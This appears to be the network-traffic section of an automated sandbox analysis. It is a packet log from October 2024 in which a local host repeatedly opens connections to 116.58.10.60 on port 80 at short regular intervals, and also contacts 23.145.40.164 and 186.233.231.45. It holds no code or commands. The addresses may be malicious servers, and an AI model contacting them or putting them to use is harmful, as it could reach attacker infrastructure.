Oct 11, 2024 06:37:51.737611055 CEST	80	50568	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:51.737701893 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.737759113 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.740052938 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.742892981 CEST	80	50568	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:51.745299101 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:51.745408058 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.745544910 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.745570898 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:51.751040936 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:51.751076937 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.006021023 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.006064892 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.006273031 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.006273985 CEST	50569	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.008461952 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.013237000 CEST	80	50569	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.014559984 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.014760971 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.014760971 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.014760971 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:53.020190001 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:53.020231009 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.248764038 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.248809099 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.248894930 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.249042988 CEST	50570	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.251231909 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.254220009 CEST	80	50570	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.256558895 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.258959055 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.259085894 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.259109974 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:54.264517069 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:54.264559031 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.768132925 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.768893003 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.768968105 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.769026995 CEST	50571	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.772492886 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.774260998 CEST	80	50571	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.777599096 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.777698994 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.777796984 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.777796984 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:55.782942057 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:55.783459902 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:57.005718946 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:57.008706093 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:57.008913040 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:57.008996964 CEST	50573	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:57.010603905 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.010699034 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.010823011 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.011092901 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.011116982 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.014138937 CEST	80	50573	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:57.634265900 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.634458065 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.635695934 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.635710955 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.636122942 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.642945051 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.687423944 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.852514029 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.852576017 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.852735996 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.852756977 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.899642944 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.940167904 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.940191031 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.940231085 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.940265894 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.940627098 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.940690041 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.941570044 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.941637039 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:57.942553997 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:57.942620039 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.028590918 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.028736115 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.029052973 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.029124975 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.030018091 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.030093908 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.030534029 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.030603886 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.031589985 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.031672955 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.032476902 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.032562017 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.032902956 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.032967091 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.098460913 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.098541975 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.117683887 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.117753983 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.118442059 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.118511915 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.119029045 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.119105101 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.119987965 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.120054960 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.120805025 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.120872974 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.121834040 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.121901035 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.122464895 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.122541904 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.123557091 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.123637915 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.123644114 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.123671055 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.123708010 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.123733997 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.124512911 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.124588966 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.125350952 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.125431061 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.126234055 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.126315117 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.187056065 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.187266111 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.206125021 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.206315994 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.206782103 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.206850052 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.207741976 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.207811117 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.208283901 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.208353043 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.208403111 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.208461046 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.208483934 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.208518028 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.208530903 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.208558083 CEST	50575	443	192.168.2.4	23.145.40.164
Oct 11, 2024 06:37:58.208564997 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.208587885 CEST	443	50575	23.145.40.164	192.168.2.4
Oct 11, 2024 06:37:58.771692991 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:58.776604891 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:58.776696920 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:58.776828051 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:58.776828051 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:58.781800032 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:58.781807899 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.041280031 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.041382074 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.041548967 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.041548967 CEST	50581	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.045056105 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.047127008 CEST	80	50581	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.051393032 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.051461935 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.051572084 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.051572084 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:00.056654930 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:00.057559967 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.303699017 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.303762913 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.304384947 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.310750008 CEST	50592	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.315589905 CEST	80	50592	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.347964048 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.352771044 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.352844000 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.353420019 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.353645086 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:01.358424902 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:01.358467102 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.601669073 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.605293036 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.605345011 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.605416059 CEST	50598	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.610383987 CEST	80	50598	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.614419937 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.619422913 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.619498014 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.619596958 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.619611025 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:02.624492884 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:02.624686003 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:03.860030890 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:03.860435963 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:03.860532045 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:03.863010883 CEST	50609	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:03.867820024 CEST	80	50609	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:04.115765095 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:04.120974064 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:04.121053934 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:04.121186972 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:04.121220112 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:04.126439095 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:04.126470089 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.389015913 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.389090061 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.389156103 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.389230013 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.391166925 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.391706944 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.391858101 CEST	50615	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.394346952 CEST	80	50615	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.398776054 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.398847103 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.398963928 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.398978949 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:05.404403925 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:05.404445887 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.632905960 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.632951975 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.633083105 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.633268118 CEST	50626	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.638308048 CEST	80	50626	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.690871954 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.696376085 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.698951960 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.721301079 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.724843025 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:06.726895094 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:06.730436087 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.949136019 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.949237108 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.949301958 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.949423075 CEST	50636	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.953970909 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.954272985 CEST	80	50636	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.958858967 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.958945990 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.959048033 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.959081888 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:07.966917038 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:07.967021942 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.232206106 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.233320951 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.233414888 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.233464956 CEST	50643	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.235726118 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.238487959 CEST	80	50643	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.241317034 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.241405010 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.241578102 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.241612911 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:09.246623039 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:09.246651888 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.504018068 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.505822897 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.505968094 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.505968094 CEST	50654	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.508598089 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.510869980 CEST	80	50654	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.513475895 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.513535023 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.513645887 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.513672113 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:10.518469095 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:10.519105911 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:12.056718111 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:12.057830095 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:38:12.057885885 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:12.058012009 CEST	50664	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:38:12.062980890 CEST	80	50664	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:20.248389959 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:20.253515005 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:20.253611088 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:20.253727913 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:20.253737926 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:20.258757114 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:20.258785963 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:21.575018883 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:21.577886105 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:21.577977896 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:21.578025103 CEST	50850	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:21.584758043 CEST	80	50850	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:27.302784920 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:27.307620049 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:27.307697058 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:27.307861090 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:27.307879925 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:27.312803030 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:27.313008070 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:28.713341951 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:28.718380928 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:28.718450069 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:28.718489885 CEST	50851	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:28.723320961 CEST	80	50851	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:35.066112041 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:35.070965052 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:35.071059942 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:35.071202993 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:35.071230888 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:35.076014042 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:35.076159954 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:36.315859079 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:36.316833973 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:36.316984892 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:36.316984892 CEST	50852	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:36.321995020 CEST	80	50852	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:43.727514029 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:43.732470036 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:43.732564926 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:43.732719898 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:43.732743979 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:43.737466097 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:43.737598896 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:44.998517036 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:44.999238014 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:44.999341011 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:44.999341011 CEST	50853	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:45.004489899 CEST	80	50853	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:54.196448088 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:54.201297998 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:54.201453924 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:54.201596022 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:54.201617956 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:54.206414938 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:54.206651926 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:55.430552006 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:55.431031942 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:39:55.431116104 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:55.431153059 CEST	50854	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:39:55.435930014 CEST	80	50854	116.58.10.60	192.168.2.4
Oct 11, 2024 06:40:07.583535910 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:07.588501930 CEST	80	50855	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:07.588598967 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:07.588702917 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:07.588721991 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:07.593848944 CEST	80	50855	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:07.593878031 CEST	80	50855	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:08.776712894 CEST	80	50855	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:08.776763916 CEST	80	50855	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:08.776917934 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:08.776957989 CEST	50855	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:08.781857014 CEST	80	50855	186.233.231.45	192.168.2.4
